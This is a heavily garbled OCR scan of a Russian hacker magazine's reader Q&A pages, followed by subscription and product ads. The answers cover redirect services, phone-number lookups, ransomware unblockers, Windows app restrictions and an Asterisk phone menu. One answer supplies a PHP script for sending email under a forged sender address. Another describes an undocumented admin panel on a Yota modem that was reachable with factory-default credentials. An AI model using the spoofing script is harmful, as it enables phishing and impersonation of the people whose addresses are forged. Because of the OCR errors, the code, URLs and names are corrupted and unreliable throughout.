3. Передача цифровыхтоваров — небезызвест- 
ный Оідізеііег.ги, позволяющий создавать свои 
собственные онлайн-магазины. 

4. Защита программ от пиратов (ЗоИѵѵаге 
асбѵаЬоп зегѵісе) — сервис, позволяющий 
защитить свой софт от пиратов. Подробности 
читаем на ѵѵѵѵѵѵ.зоІіасПѵаПоп.сопп/азр/аЬоиб 
азр . 

5. Защита сделок— популярный сервисорга- 
низации ѴѴМ-трастов, позволяющих объеди- 
няться с предполагаемыми партнерами для 
формирования совместных вкладов. Находится 
сервистут: ітизбѵѵеЬппопеѵ.ги . 

0: Подскажи, какс помощью РНРотправлять 
письма с чужого е-таіі? 

А: С поставленнойтобой задачей успешно 
может справиться небольшой и очень простой 
скрипт: 

<?рЪр 

//Параметры письма 
$зиЬдесб = 'Заголовок письма' ; 
$теззаде = 'Текст сообщения' ; 
$бгот_пате = 'Имя отправителя' ; 
$бгот_таі1 = 'Адрес отправителя' ; 

$бо = 'Адрес получателя' ; 

$ргіогібу = 1; //приоритет, от 1 до 3 

//Заголовки письма 
$ЪосЗу = " $теззаде\п" ; 

$бгот = "$бгот_пате <$бгот_таі1>" ; 
$Ьеас1егз = "Сопбепб-Туре : бехб/ 

Ъ.бт1; сЬагзеб=ѵ\мпс1очлз-1251\п" ; 
$Ьеабегз .= "Ргош: $бгот_таі1\п" ; 
$Пеабегз .= "Х-Маііег: ТЬ.е Ваб ! 
2005\п" ; 

$Ьеас1егз .= "Х-Ргіогібу: 

$ргіогібу\п" ; 

//Отправка письма 

таіі ( $бо , $виЬд есб , $Ъос1у , $Пеабегз ) ; 
?> 
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0: Какие существуют сервисы по предоставле- 
нию коротких ссылок для редиректа? 

А: Один из самых больших списков таких 
сервисов составил участникфорума Античат 
[БТеІ: ЫірУЛогит.апІісЬаІ.гиАЬгеасІІ 69495. 
Мті. Перечисленные сервисы бесплатны и 
предоставляют следующие услуги: 

• статистика по переходам; 

• простой редирект; 

• редирект во фрейме; 

• редиректс рекламой и без; 

• ссылка на редирект вида зТе.сст/зІхіпд; 

• ссылка на редирект вида зиЬботеп.зіІе.сот. 
От себя добавлю, что самым известным и ста- 
бильным сервисом такого рода является Ыір:// 
Ііпѵигі.сот . 

0: Достаточно часто стали приходить 5М5-ки 
с просьбой кинуть деньги на определенный 
номер, перезвонить, кликнуть по линку и т.д. — 
словом, сплошь и рядом один лохотрон. Более 
того — ребята даже не стесняются звонить, 
называя меня по имени и бросая трубку. Очень 
хочется подчас пробитьтелефоны по какой- 
нибудь базе, но понимаю, что ничего такого в 
открытом доступе нет. К тому же, непонятно, к 
какому оператору эти номера принадлежат (и 
соответственно, к каким людям обращаться за 
справкой). Так вот: как можно выяснить опера- 
тора и регион, к которому относится номер? Ведь 
это, как и коды городов, должно быть открытой 
информацией? 

А: Да, выяснить оператора и регион, к кото- 
рому приписана симка, можно совершенно 
бесплатно, воспользовавшись снлайн- 
сервисом: ШрѴ/ітіи.ги/іпФ/сІеіУіпсІех.ѵѵЬр . 
Достаточно указать Код БЕЕ (910, 903 и т.д.) , 
означающий, какправило, оператора и ре- 
гион, и собственно остатоктелефонного но- 
мера. Возможно и обратное преобразование. 
Выбери нужного оператора, область РФ — 
и получишь все номерные емкости в виде 
списка. Отличный сервис: не хватает разве 
что ХМ І_- интерфейса. 

О: Самые разные знакомые уже замучили прось- 
бами излечить их компьютер от«блокировки 
порнушкой, которая закрыла весь экран и просит 
отправить 5М5 для того, чтобы от нее избавить- 
ся». Причем больше половины из них этим спо- 
собом не преминуло воспользоваться :). Устал 
работать «ручным антивирусом». Наверняка же 
есть автоматические тулзы, как раз нацеленные, 
чтобы эту дрянь удалить? 

А: Ох, скольким я уже помог — не счесть. Теперь, 
когда времени нет, я просто даю линки на так 
называемые деблокеры: Ііпіоскегот Ог.ѴѴеЬ 
( ѵѵѵѵѵѵ.бгѵѵеЬ.сопп/ипІсскег/іпсІех ] и ОеЫоскегот 
Лаборатории Касперского [ зиррогТказрегзкѵ. 
ги/ѵігизез/сІеЫоскег ]. В каждом из этих онлайн- 
сервисов необходимо ввести телефона номер, 
на который предлагается отправить 5М5, а 
сервис в свою очередь предоставляет код для 
разблокировки. 




О: Что за история с открытой админкой в «Яйце 
отУоІа» — маленьком девайсе, позволяющем 
расшарить ѴѴіМах-инет через ѴѴі-Рі? 

А: Нюанс заключается в наличии уустройства 
двух админок: одной — официальной отопе- 
ратора Уоіа, и второй — оригинальной панели 
администратора, доступной в устройстве 
ІпІегЬго КѴѴІ В2200 от производителя. Секрет 
в том, что всем пользователям предлагается 
использовать упрощенную и усовершенство- 
ванную админку отѴЫа (192.168.1 .1], в то время 
какоригинальная админка девайса незаметно 
располагается по адресу 192.168.1 .254, а факт 
ее наличия остается недокументированным. 
Увы, пароль на последнюю оставался неизмен- 
ным с завода, и, набрав абтіп/асіппіп, каждый, 
кто уже подключился кдевайсу по ѴѴі-Рі, мог 
подключиться и управлять «Яйцом отѴЫа». 
Понятно, что, не зная ключа на ѴѴі-Рі (в случае 
если беспроводная сеть была защищена), 
подключиться кадминке было невозможно. 

Но если стобой поделились ключом илиты 
вообще попал на открытую сеть, то такая атака 
была возможной. Баг после публичной огласки 
быстро прикрыли. 

О: Много пишу на ^ для сайтов (онлайн-игры). 
Понял, что многие проверки, реализующие 
безопасность, использую во многих местах и 
оформил их в виде небольшого фреймворка. 
Хотел бы сравнить свое решение с подобными 
разработками от авторитетных разработчиков. 
Можете что-нибудь посоветовать? 

А: Хотя бы раз, ноты наверняка использовал 
какую- ни будь утилиту, входящую в проект 
0ѴѴА5Р ( ѵѵѵѵѵѵ.оѵѵазр.ога і. который объединяет 
большое количество программ для людей, 
занимающихся информационной безопаснос- 
тью. В рамках этого проекта разрабатывается 
и 0ѴѴА5Р Е5АРІ465 ( ЫірУ/сосІе.доодІе.сопп/р/ 
сѵѵазр-езарі^з ). Разработанный китайскими 
хакерами, фреймворк предоставляет большое 
количество функций, реализующих проверки 
и фильтрацию ввода, пользователю для того, 
чтобы быстро писать безопасный 55-код. Ктому 
же, с использованием Е5АРІ465 исходники 
становятся намного читабельнее и опрятнее. 

0: Есть шелл-код в бинарном виде. Как проще 
преобразовать его в разные форматы: например, 
в\и4241\и2743\и(Ю22\и000А, или, скажем, \х41\ 
х42\х43\х27\х22\х(Ю\х0А\х00? Лениво каждый 
раз делать это вручную. 

А: Есть классная утилита ВЕТАЗ ( ЫірУ/сосІе. 
доодІе.сот/р/ЬеІаЗ ). позволяющая преобразо- 
вать шелл-код из бинарного представления в 
текстовой вид, причем в 16 различных форма- 
тов — любых, какиетолько могут понадобиться. 
Рекомендую. 

0: Хочу внутри компании поднять своего поиско- 
вого робота - что-то вроде Ооодіе-бота, который 
будет серфить внутренние ресурсы и индексиро- 
вать все данные для дальнейшего поиска. Нужно 



решение, причем обязательно ореп-воигсе! 

А: Существует немало подобных решений, 
но я советую начать с изучения следующих 
проектов: 

Е>ББЕ>с{ ( ѵѵѵѵѵѵ.ІѵѵппасіпІа.сопп/ЬсІсІЬоі ) — очень 
простое, но потому и очень полезное решение, 
еслиты хочешь разобраться, какв принципе 
устроен ПОИСКОВИК; 

ЗрЫбег кл/ѵѵѵѵ.зрЫсІег.еи ) — решение с легко 
читаемым кодом на РНР, представляющее собой 
веб-паука, который хранит данные в базе МуБОБ; 
ОрепѴѴеЬБрібегІ ѵѵѵѵѵѵ.срепмеЬзрісІег.сгд ] — 
паук для индексирования данных, оптимизи- 
рованный именно для работы с веб, в котором 
реализованы механизмы многопоточности. 
ІЧіЛсб ( [цсепе.арасбе.огд/пиІсЫ — реализация 
поискового механизма на Заѵа ; 

ХОЕпдіпе ( хдепдіпе.зсигсеіюгде.пеі: ] — поиско- 
викподанным, хранящимся вХМБ-фсрмате. 

0: Можно ли как-нибудь ограничитьучетную за- 
пись ѴѴіпсіоѵѵб для запуска строго определенных 
приложений, и при этом использовать только 
локальные политики? 

А: Такая возможность, наконец-то, появилась в 
ѴѴіпсІсѵѵз 7. Для ЭТОГО: 

• запускаем оснастку для управления локаль- 
ными политиками: выполнить -> «дресІіЕтзс»; 

• переходим в ветку «БІзегСсп1 : ідига1:юп\ 

Аб т і п і 5І га 1: і ѵе Те т р Іа 1: е з\5у зі: е т » ; 

• ищем раздел «Бузует» и в нем ключ — Рип опіу; 

• устанавливаем значение «ЕпаЫе» и ниже, в 
секции «Орііспз», нажимаем кнопку «5Ьоѵѵ» 
рядом с опцией «Бізі с^аіісѵѵеб арріісабспз»; 

• в появившемся спискезаносим программы, 
которые разрешены для запуска обычным 
пользователем. 

Защита, прямо скажем, так себе, поэтому если 
нужно действительно серьезное ограничение 
на запуск программ, то лучше взглянуть в сто- 
ронутехнологии Арріоскег, также появившейся 
в ѴѴіпсІоѵѵз 7. 

0: Для своей небольшой компании хочу орга- 
низовать автоответчик с меню, которым может 
воспользоваться дозвонившийся человек. 
«Нажмите 0 для связи с секретарем, 1 — для 
того, чтобы узнать свой баланс» и т.д. Подскажи, 
как наиболее просто это сделать? 

А:Тебе псмсжет небезызвестный Азіегізк ( ѵѵѵѵѵѵ. 

тізк.сгд ]. Этссченьгибкаятелефснная 
платфсрма, на сснсве кстсрсй дсстатсчнс легкс 
стрсить прилсжения. Например, прсстейшее 
ІѴР-меню (ІпІюгасБѵеѴсісе Резрспзе),тс есть 
систему предварительнс записанных гслссс- 
выхсссбщений, кстсрая выпслняет функцию 
маршрутизации звснксв, псльзуясь инфсрма- 
цией, ввсдимсй клиентам с псмсщьютсналь- 
нсгс набсра. Таксе прилсжение с псмсщью 
астерикса мсжетбытьпсстрсенсза 20 минут, 
при этсм наибсльшее время истребуется на 
записьзвуксвыхфайлсвдля меню. За примерсм 
прсстейшей системы стправляйся — ЬирУ/пад. 
ги/пеуѵз/17515 . ШИ 
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ВНУТРЕННОСТИ НОВОГО РУТКИТА 
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БУДЬ УМНЫМ! 

ХВАТИТ ПЕРЕПЛАЧИВАТЬ В КИОСКАХ! СЭКОНОМЬ 660 РУБ. НА ГОДОВОЙ ПОДПИСКЕ! 




Годовая подписка по цене 2100 ру 



175 руб. за один номер, что на 23% дешевле чем рекомендуемая розничная цена (230 
руб. за одн номер ) 




ЕДИНАЯ ЦЕНА ПО ВСЕЙ РОССИИ. ДОСТАВКА ЗА СЧЕТ ИЗДАТЕЛЯ. В ТОМ ЧИСЛЕ КУРЬЕРОМ ПО МОСКВЕ В ПРЕДЕЛАХ МКАД 
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ВНИМАНИЕ! 

ВТОРОЕ 



+ СПЕЦПРЕДЛОЖЕНИЕ! 



ПРИ ПОДПИСКЕ НА КОМПЛЕКТ ЖУРНАЛОВ 
ЖЕЛЕЗО + ХАКЕР + ОѴР: 

- ОДИН НОМЕР ВСЕГО ЗА 155 РУБЛЕЙ 
(НА 35% ДЕШЕВЛЕ. ЧЕМ В РОЗНИЦУ) 



И ЭТО ЕЩЕ НЕ ВСЕ! 
ПОЛУЧИ В ПОДАРОК 
ОДИН ЖУРНАЛ 
ДРУГОЙ ТЕМАТИКИ 



ОФОРМИВ ГОДОВУЮ ПОДПИСКУ 
В РЕДАКЦИИ, ТЫ МОЖЕШЬ 
БЕСПЛАТНО ПОЛУЧИТЬ ОДИН 
СВЕЖИЙ НОМЕР ЛЮБОГО 
ЖУРНАЛА, ИЗДАВАЕМОГО 
КОМПАНИЕЙ «ГЕЙМ ЛЭНД»: 



ЗА 24 НОМЕРА 



ЗА 12 НОМЕРОВ 



ГГС 



фато 

МАСТЕРСКАЯ 



■ : : и а , 



«чда» — 

тн 

«Фото- «Мобильные «ТЗ. Техника «Страна Игр» «Вышиваю 

мастерская»+Сй компьютеры» Третьего Тысячелетия» +20Ѵй крестиком» 



«Тюнинг 

Автомобилей» 



□ІЮ 



НфіЕпР дешевеет 



Зітоке Тоіаі ОѴО+ОѴО «Железо»+0Ѵ0 ОѴОХрегГ «РС Игры»+20Ѵ0 ОідіТаІ РЬоТо 



• ЯНВАРСКИЙ НОМЕР — подписавшись 
до 30 ноября 

• ФЕВРАЛЬСКИЙ НОМЕР — подписавшись 
до 31 декабря 

• МАРТОВСКИЙ НОМЕР -подписавшись 
до 31 января 









СЕРВИС 



ВЫГОДА • ГАРАНТИЯ • 



ЗТО ЛЕГКО!!! 

1. Разборчиво заполните подписной купон и квитан- 
цию, вырезав их из журнала, сделав ксерокопию 
или распечатав с сайта вбор.аіс.ги . 

2. Оплатите подписку через любой банк. 

3. Вышлите в редакцию копию подписных докумен- 
тов — купона и квитанции — любым из нижепере- 
численных способов: 

• по электронной почте зиЬ$сгіЬе@дІс.ги; 

• по факсу 8 (495) 780-88-24; 

• по адресу 119021, Москва, 

ул. Тимура Фрунзе, д. 11, стр. 44, 

ООО «Гейм Лэнд», отдел подписки. 



ВНИМАНИЕ! 

ПОДПИСКА ОФОРМЛЯЕТСЯ 
В ДЕНЬ ОБРАБОТКИ КУПОНА И КВИТАНЦИИ 
С НОМЕРА. ВЫХОДЯЩЕГО ЧЕРЕЗ ОДИН 
КАЛЕНДАРНЫЙ МЕСЯЦ ПОСЛЕ ОПЛАТЫ. 

Например, если произвести оплату в январе, 
то подписку можно оформить с марта. 

В КАЖДОМ НОМЕРЕ УНИКАЛЬНЫЙ Ш 
СТОИМОСТЬ ЗАКАЗА 

2100Р ЗА 12 МЕСЯЦЕВ + ПОДАРОЧНЫЙ ЖУРНАЛ 
1200Р НА 4 МЕСЯЦЕВ. ПОДАРОЧНЫЙ ЖУРНАЛ ПРИ ЭТОМ НЕ ВЫСЫ- 
ЛАЕТСЯ 



Длля жителей Москвы (в пределах МКАД) доставка может осуществляться бесплатно с курьером «из рук в руки» в течении трех рабочих 
дней с момента выхода номера на адрес офиса или на домашний адрес 



ЗВОНИ! по бесплатным телефонам 8(495)780-88-29 
(для москвичей) и 8(800)200-3-999 (для жителей дру- 
гих регионов России, абонентов сетей МТС, БиЛайн 
и Мегафон). ТВОИ ВОПРОСЫ, ЗАМЕЧАНИЯ И/ИЛИ 
ПРЕДЛОЖЕНИЯ ПО ПОДПИСКЕ НА ЖУРНАЛ ПРОСИМ 
ПРИСЫЛАТЬ НА АДРЕС: іпіоіадіс.ги 



ОФОРМИТЬ ПОДПИСКУ на Хакер стало еще 
проще! 

Еще один удобный способ оплаты подписки 
на твое любимое издание — в любом из 
72 000 платежных терминалах ОІѴѴІ (КИВИ) 
по всей России. 




ПОДПИСНОЙ КУПОН 



ПРОШУ ОФОРМИТЬ ПОДПИСКУ 
НА ЖУРНАЛ « 


» 


П на 6 месяцев 
]] на 12 месяцев 




начиная с 


о 

С\| 


^ прошу выслать бесплатный 
номер журнала 



|— I Доставлять журнал по почте 
1 на домашний адрес 

Доставлять журнал курьером : 

□ на адрес офиса* 

□ на домашний адрес** 

(отметь квадрат выбранного варианта подписки) 

Ф.И.О. 



АДРЕС ДОСТАВКИ: 

индекс 

область/край 

город 

улица 

дом корпус 

квартира/офис 

телефон ( ) 

код 

е-таіі 

сумма оплаты 

*в свободном поле укажи название фирмы 
и другую необходимую информацию 
**в свободном поле укажи другую необходимую информацию 
и альтернативный вариант доставки в случае отсутствия дома 

свободное поле 



Извещение 



ИНН 7729410015 ООО «Гейм Лэнд» 

ОАО «Нордеа Банк», г. Москва 

р/с N° 40702810509000132297 



к/с № 30101810900000000990 



БИ К 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


20 г. 





Кассир 



Ф.И.О. 

Подпись плательщика 



Квитанция 



ИНН 7729410015 



ООО «Гейм Лэнд» 



ОАО «Нордеа Банк», г. Москва 
р/с № 40702810509000132297 



к/с № 30101810900000000990 



БИ К 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


20 г 





Кассир 



Ф.И.О. 

Подпись плательщика 



НТТР://ѴѴѴѴѴѴ2 




ч» 

- 




♦ V 



ѴЭ 




щшщ 



ІА:У] ||‘ь(*пг& - Пга РжЗч Ьн к КП:^І 



ля 



РІлпсо 



і простоплеер яяя* 

•віыржэф ||*>ІР«Л уіуаіпм* ЩГ*ТІМ Л>РЧ- іа* ШЦ ||«1 



иышы 



1 1 - і [гісРіуйін ГгтДуІні Р|.''іза На іімй гнгідіі Я# !>•• 
[рі ІгкСппЬ Р|*ио 

[Г| ГітС|*гп- іРІ-чѵ ’ >'• •.;••« №•»«! і.к*іг-і| 

[к] М1й|ш т «I - ІЬЬм Дліш.І ; . ,. 

2 (гіс ГгИі і'| ли» 

тя^і 



рѵ 



Поиск музыки 
и онлайн-радио 



ПРОСТОПЛЕЕР 



Г4 




НІРтапіа. сот 

ѴѴогІсІІР - Ьм* деоіосаііоп гіаСаЬазѳ. бвгѵісв зпО іс<^& 



| Р.п; | | Тік^ц^д Г | | уу-ціі | | Оіруівді [Н4 ) ' 




ИпіМРІ Ѵ№Пидіп іѴіР-Т&фіі 



Продвинутый ріпд 
и ігасегоиіе с разных 
серверов 



ргозіоріеег.сот 



Если тебе нужен сервис, где бы ты мог, во-первых, искать и скачивать 
музыку, а, во-вторых, удобно слушать ее онлайн (а именнотаки было 
нужно мне], то простоплеер станет для тебя настоящей находкой. Быст- 
рый поиск музыки по нескольким источникам (не стесняйся жать кнопку 
«Поиск» несколько раз] дополняется простым, но оттого-то и удобным 
онлайн-плеером с поддержкой плейлистов. Раз создав трек-лист, можно 
слушать музыку с любого компьютера — и при этом даже не регистриро- 
ваться. Вотуж правда — простоплеер! 



ѴѴІРМАЫІА 

ѵѵѵѵѵѵ.ѵѵіртапіа.сот 

Ранее, если было подозрение, что какой-то сайт упал из-за очередных 
проблем с маршрутизацией у провайдера, я использовал сервисов* - 
ріпд.сот, с помощью которого пинговал нужный сервер совершенно из 
другого места (если пингуется, значит, проблемы у моего прова]. Теперь 
же появился вариант на много лучше: ѴѴІ Рта піа может пропин говать за- 
данный хост одновременно с множества серверов по всему миру. Сделать 
ІтасегоіКе, ѵѵбоіз и даже обратный БІ\І5. Для удобства есть плагин для 
Рігебох, а разработчики могут использовать ѴѴІРтапіа через АРІ. 
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Продвинутый сборник 
алгоритмов 



1С ±І±ІІІ-Е. І 






ІТ-ЕѴЕЫТ 

ІІ-еѵепГги 

Получить новые знания, познакомиться с единомышленниками и 

людьми втеме, найти потенциальных работников и работодателей и, в 
конце концов, банально отдохнуть можно на различных мероприятиях в 
сфере ІТ. ІТ-ЕѵепІ; — не самый притязательный сайт (вероятно, пока], зато 
его создатели сумели собрать всю информацию о проходящих ІТ-событи- 
ях в России, разгруппировав ее по городам. Выбирай, что тебе интересно, 
покупай билеты, ищи, к кому вписаться — и вперед! 



АІ.60ШТНМАТІС 

МдогИДтаЩ 

В инете существует немало сборников различных алгоритмов, но, 

чтобы ресурс был оформлен в виде социального сервиса, с возможнос- 
тью совместной работы с помощью редактора кода и даже отладчика, я 
вижу впервые. Чего стоит одно только автодополнение кода, правда, для 
реализации пришлось использовать БіІѵегІідЫ, поэтому будь готовуста- 
новить соответствующий плагин для браузера. СейчасуАІдогііЬтабс не 
самая большая база алгоритмов, но их количество постоянно растет. 
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Наш РС никогда не висит! 




А Альфа Банк (дате)іамі 



( 495 ) 78 - 888-78 (для Москвы), 8 - 800 - 2000-000 (бесплатно ДЛЯ регионов России) ОАО «АЛЬФА-БАНК». Генеральная лицензия Банка России на осуществление банковских операций от 29.01.1998 №1326 . НА ПРАВАХ РЕКЛАМЫ. 



Реклама 



ѴѴіпсІоѵѵз®. Жизнь без преград. 
ТозЫЬа рекомендует ОС ѴѴіпсІоѵѵз 7. 




> ДОВЕРЬТЕ Т05НІВА 
СОЗДАНИЕ ЕЩЕ 
ОДНОГО ШЕДЕВРА 

Что делает искусство искусством? Преданность своему делу? 
Мастерство? Количество часов, потраченных на создание 
произведения? 



Или искусство рождается в слиянии страсти и инноваций? 



Истинная красота нашей новой линейки ЗаТеІМТе - в гармоничном 
сочетании всего этого. Но шедевр, которым мы гордимся 
даже больше - это ваше доверие, которого мы достигли, 
прислушиваясь к вам на протяжении более чем 25 лет и 
меняясь, чтобы соответствовать вашим потребностям. 

Это и есть искусство понимания, которое проявляется 
во всем, что мы делаем. 



Насладитесь всеми нашими шедеврами, включая новый 
ЗаІеІІііе І_500, оснащенный процессором ІпіеГ Соге™2 Эио. 
Спрашивайте в магазинах или зайдите на ѵѵѵѵѵѵ.ІозЫЬа.ги. 



ХпіеНИе 




> 8АТЕШТЕ І_500 

До процессора Іпіеі® Соге™2 Оио 

Лицензионная ОС ѴѴіпсІоѵѵз® 7 
Ноте Ргетіит 

Стандартная цифровая 
клавиатура 

Сенсорная панель с технологией 
МиШ ТоисИ 

ІІЗВ с технологией 
ЗІеер-апсІ-СНагде 



От 20 000 рублей* 



*Цены могут отличаться от указанных. 



Т08НІВА 

ЬеасПпд Іппоѵаііоп » 



Іпіеі, логотип Іпіеі, Іпіеі Іпзісіе, Іпіеі Соге и Соге Іпзісіе являются товарными знаками корпорации Іпіеі на территории США и других стран. Місгозоіі, ѴѴіпсІоѵѵз и ѴѴіпсІоѵѵз 7 являются либо товарными знаками, либо зарегистрированными 
товарными знаками корпорации Майкрософт в США и других странах. Все товарные знаки зарегистриро^^НН|И1ские характеристики продукта, конфигурации, цены и доступность системы, компонентов или запасных частей 
могут изменяться без предварительного уведомления. Дизайн и цвет изделий могут быть изменены без преіварительніго уведомления и могут отличаться от представленных здесь. Ошибки и пропуски исключены. 



